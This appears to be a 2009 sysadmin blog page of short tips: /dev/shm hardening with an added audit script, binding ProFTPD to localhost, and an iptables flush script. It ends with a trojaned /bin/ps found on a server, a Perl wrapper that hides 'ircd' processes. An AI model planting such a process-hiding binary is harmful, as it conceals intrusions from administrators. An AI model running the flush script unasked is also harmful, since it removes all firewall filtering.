December 2009

Securing /dev/shm

Edit your /etc/fstab:

# vi /etc/fstab

change:

none /dev/shm tmpfs defaults,rw 0 0

to

none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0

Remount /dev/shm:

# mount -o remount /dev/shm

You can test it by running a script on /dev/shm; if you get “permission denied”, it is fine!
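To confirm that both the persistent entry in /etc/fstab and the live mount table carry the new options, a check like the following can be used. It is an added example, not part of the original post; the function names missing_shm_opts and audit_shm are made up for illustration, and the sample tables are constructed from the two fstab lines above.

```shell
#!/bin/sh
# Added example (not from the original post): audit /dev/shm mount options.
# Works on any fstab-format table, so it covers /etc/fstab and /proc/mounts.

# Print the hardening options missing from the /dev/shm entry in file $1
# (empty output = both present), or "no-entry" when /dev/shm is not listed.
missing_shm_opts() {
    awk '
        /^[[:space:]]*#/ { next }                   # skip fstab comments
        $2 == "/dev/shm" { opts = $4; found = 1 }   # last matching entry wins
        END {
            if (!found) { print "no-entry"; exit }
            n = split(opts, o, ",")
            for (i = 1; i <= n; i++) {              # a later exec/suid overrides
                if (o[i] == "noexec" || o[i] == "nosuid") on[o[i]] = 1
                if (o[i] == "exec"   || o[i] == "suid")   on["no" o[i]] = 0
            }
            out = ""
            if (!on["nosuid"]) out = "nosuid"
            if (!on["noexec"]) out = out (out == "" ? "" : " ") "noexec"
            print out
        }' "$1"
}

# Check each table given as an argument; return 1 if any of them fails.
audit_shm() {
    rc=0
    for table in "$@"; do
        [ -r "$table" ] || { echo "FAIL $table: unreadable"; rc=1; continue; }
        missing=$(missing_shm_opts "$table")
        if [ -n "$missing" ]; then
            echo "FAIL $table: /dev/shm lacks: $missing"; rc=1
        else
            echo "OK   $table: /dev/shm is nosuid,noexec"
        fi
    done
    return $rc
}

# Constructed sample tables: the "before" and "after" fstab lines from the post.
tmp=$(mktemp -d)
printf 'none /dev/shm tmpfs defaults,rw 0 0\n' > "$tmp/before"
printf 'none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0\n' > "$tmp/after"
audit_shm "$tmp/before" "$tmp/after" || true
# On a real host: audit_shm /etc/fstab /proc/mounts
```

Running it against both /etc/fstab and /proc/mounts catches the case where fstab was edited but /dev/shm was never remounted, and the reverse.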


ProFTP(D) – listen on single ip

I don’t use FTP, but WordPress comes with this nice feature to upgrade plugins automatically from the web admin interface, and it needs FTP.

The problem is I don’t want to enable the FTP service and make it available to the rest of the world just for that.

So I need the following two options in proftpd.conf:

DefaultAddress 127.0.0.1
SocketBindTight on

Now restart proftpd and you’re done.


Iptables Flush

Full flush iptables script:

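#!/bin/sh
# Flush all rules (-F) and delete user-defined chains (-X) in the filter table
iptables -F
iptables -X
# Same for the nat and mangle tables
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
# Reset the default policies to ACCEPT: after this the host is unfiltered
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT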


Bastard code. (1)

srv:/bin# cat ps
#!/usr/bin/perl
use warnings;
use strict;

my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(ircd)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(ircd)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}
